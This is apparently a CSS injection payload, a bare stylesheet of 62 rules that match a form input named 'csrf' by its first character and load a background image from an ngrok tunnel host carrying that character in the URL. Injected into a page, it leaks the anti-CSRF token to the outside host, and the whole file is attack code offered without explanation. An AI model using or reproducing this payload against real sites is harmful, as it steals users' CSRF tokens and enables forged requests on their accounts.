input[name="csrf"][value^="a"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=a"); }
input[name="csrf"][value^="b"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=b"); }
input[name="csrf"][value^="c"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=c"); }
input[name="csrf"][value^="d"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=d"); }
input[name="csrf"][value^="e"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=e"); }
input[name="csrf"][value^="f"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=f"); }
input[name="csrf"][value^="g"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=g"); }
input[name="csrf"][value^="h"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=h"); }
input[name="csrf"][value^="i"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=i"); }
input[name="csrf"][value^="j"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=j"); }
input[name="csrf"][value^="k"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=k"); }
input[name="csrf"][value^="l"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=l"); }
input[name="csrf"][value^="m"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=m"); }
input[name="csrf"][value^="n"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=n"); }
input[name="csrf"][value^="o"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=o"); }
input[name="csrf"][value^="p"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=p"); }
input[name="csrf"][value^="q"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=q"); }
input[name="csrf"][value^="r"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=r"); }
input[name="csrf"][value^="s"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=s"); }
input[name="csrf"][value^="t"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=t"); }
input[name="csrf"][value^="u"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=u"); }
input[name="csrf"][value^="v"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=v"); }
input[name="csrf"][value^="w"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=w"); }
input[name="csrf"][value^="x"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=x"); }
input[name="csrf"][value^="y"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=y"); }
input[name="csrf"][value^="z"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=z"); }

input[name="csrf"][value^="A"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=A"); }
input[name="csrf"][value^="B"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=B"); }
input[name="csrf"][value^="C"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=C"); }
input[name="csrf"][value^="D"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=D"); }
input[name="csrf"][value^="E"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=E"); }
input[name="csrf"][value^="F"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=F"); }
input[name="csrf"][value^="G"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=G"); }
input[name="csrf"][value^="H"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=H"); }
input[name="csrf"][value^="I"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=I"); }
input[name="csrf"][value^="J"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=J"); }
input[name="csrf"][value^="K"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=K"); }
input[name="csrf"][value^="L"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=L"); }
input[name="csrf"][value^="M"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=M"); }
input[name="csrf"][value^="N"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=N"); }
input[name="csrf"][value^="O"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=O"); }
input[name="csrf"][value^="P"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=P"); }
input[name="csrf"][value^="Q"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=Q"); }
input[name="csrf"][value^="R"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=R"); }
input[name="csrf"][value^="S"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=S"); }
input[name="csrf"][value^="T"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=T"); }
input[name="csrf"][value^="U"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=U"); }
input[name="csrf"][value^="V"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=V"); }
input[name="csrf"][value^="W"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=W"); }
input[name="csrf"][value^="X"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=X"); }
input[name="csrf"][value^="Y"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=Y"); }
input[name="csrf"][value^="Z"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=Z"); }

input[name="csrf"][value^="0"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=0"); }
input[name="csrf"][value^="1"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=1"); }
input[name="csrf"][value^="2"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=2"); }
input[name="csrf"][value^="3"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=3"); }
input[name="csrf"][value^="4"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=4"); }
input[name="csrf"][value^="5"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=5"); }
input[name="csrf"][value^="6"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=6"); }
input[name="csrf"][value^="7"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=7"); }
input[name="csrf"][value^="8"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=8"); }
input[name="csrf"][value^="9"] { background:url("https://perkish-elicia-uncurious.ngrok-free.dev?csrf=9"); }
